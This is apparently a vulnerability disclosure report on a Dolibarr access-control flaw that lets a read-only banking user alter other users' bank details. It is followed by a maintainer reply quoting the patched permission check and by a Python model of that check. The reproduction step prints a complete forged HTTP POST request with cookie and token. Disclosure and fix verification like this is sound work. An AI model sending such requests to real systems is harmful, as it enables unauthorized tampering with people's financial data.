Improper Handling of Insufficient Privileges in dolibarr/dolibarr
Reported on
May 24th 2021
💥 BUG
An unprivileged user can attach a bank account to another user.
💥 IMPACT
A user who does not have any access to "Users & Groups" can update other users' bank details.
💥 TESTED VERSION
dolibarr 14.0.0-beta
💥 STEP TO REPRODUCE
1. First go to the admin account and add user B as a normal user. Now give user B only the permission below for the "Banks and cash" module:
--->Read financial accounts
Do not give any permission for the "Users & Groups" module. So user B can't see or update any user's details, and also can't update users' bank details.
2. Now from the admin account go to the HR and Bank tab of any other user by visiting a URL like http://localhost/dolibarr-develop/htdocs/user/bank.php?id=1 and add bank details there.
3. Finally go to user B's account and send the request below to update the bank details.
POST /dolibarr-develop/htdocs/user/bank.php?id=1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 209
Origin: http://localhost
Connection: close
Referer: http://localhost/dolibarr-develop/htdocs/user/bank.php?id=1&bankid=1&action=edit
Cookie: DOLSESSID_8e8881ad773ee74880c453666c22c288=kd3isa1fp3c53e419fgn79lilo
Upgrade-Insecure-Requests: 1
ACCOUNT: TEST2

token=$2y$10$wc1M5v3Z56ITbdACetnEPu7M6Nc/xILSazkIEvhhNDwtnC4tTEvr2&action=update&id=1&bankid=1&label=cbbcbbb_by_user&bank=hghgg+by_users&number=&iban=856345255&bic=654555&domiciliation=&proprio=&owner_address=
So user B, who has no "Users & Groups" permission and only read permission on Banks, can update another user's bank details.
According to the code of v14.0.2, the controller for action=update to update a bank account is protected with `if ($action == 'update' && !$cancel && $permissiontoaddbankaccount) {`, so user B should have a write permission among the list `$permissiontoaddbankaccount = (!empty($user->rights->salaries->write) || !empty($user->rights->hrm->employee->write) || !empty($user->rights->user->creer));`
Can you check?
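As an added illustration (not Dolibarr's own code, and not part of the report or the maintainer's reply), the following Python models the v14.0.2 gate quoted above and replays the reporter's POST body from step 3 through it, once as user B (Banks & cash: read only) and once as a user holding `user->creer`. Only the `$permissiontoaddbankaccount` expression is taken from the page; the `Rights` field names, the `handle_bank_request` dispatcher and the CSRF-token comparison are assumptions made for the model.

```python
"""Model of the authorization gate on user/bank.php.

Assumed shape, not Dolibarr's code: only the permission expression
quoted by the maintainer for v14.0.2 is taken from the report thread.
"""
from dataclasses import dataclass
from urllib.parse import parse_qs

# Constructed from the reporter's captured request: the token value and
# the form body are copied from step 3 of the report.
SESSION_TOKEN = "$2y$10$wc1M5v3Z56ITbdACetnEPu7M6Nc/xILSazkIEvhhNDwtnC4tTEvr2"
REPORTED_BODY = (
    "token=" + SESSION_TOKEN +
    "&action=update&id=1&bankid=1&label=cbbcbbb_by_user&bank=hghgg+by_users"
    "&number=&iban=856345255&bic=654555&domiciliation=&proprio=&owner_address="
)


@dataclass
class Rights:
    """Subset of $user->rights relevant to this report (field names are
    assumed to mirror the PHP rights tree quoted in the thread)."""
    banque_lire: bool = False          # Banks & cash: read financial accounts
    salaries_write: bool = False       # $user->rights->salaries->write
    hrm_employee_write: bool = False   # $user->rights->hrm->employee->write
    user_creer: bool = False           # $user->rights->user->creer


def permission_to_add_bank_account(rights: Rights) -> bool:
    """Python rendering of the v14.0.2 expression:
    $permissiontoaddbankaccount = (!empty(...salaries->write)
        || !empty(...hrm->employee->write) || !empty(...user->creer));
    banque->lire is deliberately absent: read access to financial accounts
    must not grant writes to another user's bank record."""
    return rights.salaries_write or rights.hrm_employee_write or rights.user_creer


def parse_form_body(body: str) -> dict:
    """Flatten an x-www-form-urlencoded body into single-valued fields."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def handle_bank_request(body: str, rights: Rights, session_token: str):
    """Controller-style dispatch mirroring the guarded branch
    if ($action == 'update' && !$cancel && $permissiontoaddbankaccount).
    Returns (http_status, message). The CSRF token check is an assumption
    of this model; the write gate is the point of the example."""
    form = parse_form_body(body)
    if form.get("token") != session_token:
        return 403, "bad CSRF token"
    if form.get("action") == "update" and not form.get("cancel"):
        if not permission_to_add_bank_account(rights):
            return 403, "update denied: no salaries/hrm/user write permission"
        return 200, "bank record %s of user %s updated: label=%r" % (
            form.get("bankid"), form.get("id"), form.get("label"))
    return 200, "read-only view"


def reproduce_report() -> dict:
    """Replay the reporter's request as user B and as a privileged user."""
    user_b = Rights(banque_lire=True)                 # report's user B
    user_manager = Rights(banque_lire=True, user_creer=True)
    return {
        "user_b": handle_bank_request(REPORTED_BODY, user_b, SESSION_TOKEN),
        "user_manager": handle_bank_request(REPORTED_BODY, user_manager, SESSION_TOKEN),
    }


if __name__ == "__main__":
    for who, (status, msg) in reproduce_report().items():
        print(f"{who}: HTTP {status} - {msg}")
```

With the v14.0.2 gate in place, user B's replayed request is refused (403) while the same body from a user holding `user->creer` succeeds; the check a reviewer would want is that the gate sits in the controller branch for `action=update`, before any write to the bank record, rather than only hiding the edit form in the UI.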